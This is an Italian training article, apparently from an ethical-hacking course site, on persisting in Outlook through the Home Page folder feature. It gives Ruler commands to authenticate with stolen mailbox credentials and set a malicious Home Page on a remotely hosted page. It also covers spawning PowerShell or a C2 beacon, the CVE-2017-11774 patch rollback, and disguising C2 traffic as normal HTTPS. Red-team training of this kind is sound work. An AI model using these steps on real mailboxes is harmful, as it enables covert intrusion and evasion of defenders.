Iscriviti al webinar gratuito del 12 Maggio per diventare Forensic Analyst! Scopri di più
Corso Ethical Hacker: accedi alla promozione fino al 30 Aprile! Scopri di più
La funzionalità Home Page di Microsoft Outlook è un meccanismo legacy che consente di associare un URL — interno o esterno — a qualsiasi cartella del client di posta. Ogni volta che l'utente apre quella cartella, Outlook carica e renderizza il contenuto HTML indicato. Un avversario che abbia ottenuto accesso alla mailbox di una vittima può configurare una Home Page malevola su una cartella comune come Inbox o Calendar, ottenendo così l'esecuzione di codice arbitrario a ogni apertura della cartella stessa.
La tecnica si colloca nella fase di Persistence (TA0003): l'obiettivo non è l'accesso iniziale, ma il mantenimento del punto d'appoggio nel tempo. L'HTML malevolo viene caricato dal motore di rendering interno di Outlook, che supporta ActiveX e oggetti COM, offrendo una superficie di esecuzione ricca e spesso non monitorata. Il codice sopravvive ai riavvii del sistema perché la configurazione della Home Page è memorizzata come proprietà MAPI della cartella, sincronizzata con il server Exchange.
Con 1 gruppo APT documentato, 1 tool dedicato e 2 mitigazioni specifiche, questa tecnica rappresenta un vettore di persistenza chirurgico: silenzioso, difficile da individuare con strumenti tradizionali e sfruttabile anche dopo l'applicazione di patch iniziali se l'avversario dispone di exploit di rollback come CVE-2017-11774.
Il tool di riferimento per questa tecnica è Ruler (open source), sviluppato da SensePost e disponibile come binario Go compilabile per Windows, Linux e macOS. Ruler interagisce direttamente con le API MAPI/HTTP e RPC/HTTP di Exchange, permettendo di manipolare le proprietà delle cartelle senza passare per l'interfaccia grafica di Outlook.
L'operazione si articola in tre fasi: autenticazione, configurazione della Home Page e verifica dell'esecuzione.
Fase 1 — Autenticazione e discovery. Ruler necessita delle credenziali della mailbox target e dell'indirizzo dell'endpoint Autodiscover. In un ingaggio red team, queste credenziali arrivano tipicamente da password spraying o phishing. Il comando per verificare la connettività è:
ruler --email utente@dominio.com --username utente --password Password123 --url
Se l'organizzazione utilizza forme di autenticazione moderna, potrebbe essere necessario il flag --o365 per instradare le richieste verso l'infrastruttura Microsoft 365.
Fase 2 — Impostazione della Home Page malevola. Una volta autenticati, si imposta la Home Page su una cartella a scelta. La cartella Inbox è la più efficace perché viene caricata immediatamente all'avvio di Outlook:
ruler --email utente@dominio.com homepage set --url
La pagina HTML hostata dall'attaccante deve contenere un oggetto ActiveX o uno script che invochi Shell.Application o Wscript.Shell per eseguire comandi. Un payload tipico in laboratorio utilizza un semplice RunCmdA tramite l'oggetto ShellBrowserWindow per lanciare PowerShell o un beacon C2.
Fase 3 — Verifica e cleanup. Per verificare che la Home Page sia stata applicata:
ruler --email utente@dominio.com homepage get --folder Inbox
Al termine dell'esercizio, il cleanup è fondamentale:
ruler --email utente@dominio.com homepage delete --folder Inbox
Un aspetto cruciale da simulare è il bypass della patch KB4011162, che Microsoft ha rilasciato per disabilitare la funzionalità Home Page. OilRig ha dimostrato che CVE-2017-11774 consente di effettuare un rollback della protezione, riattivando la feature. In laboratorio, verificare se la patch è presente controllando la chiave di registro HKCU\Software\Microsoft\Office\<versione>\Outlook\WebView\Inbox\URL: se il valore è impostabile, la protezione non è attiva.
Per il red team, è utile combinare la persistenza Outlook con un canale C2 che utilizzi protocolli comuni (HTTPS su porta 443) per rendere il traffico generato dalla Home Page indistinguibile dal normale browsing dell'utente.
Scarica la guida gratuita e segui il percorso corretto fin dal primo passo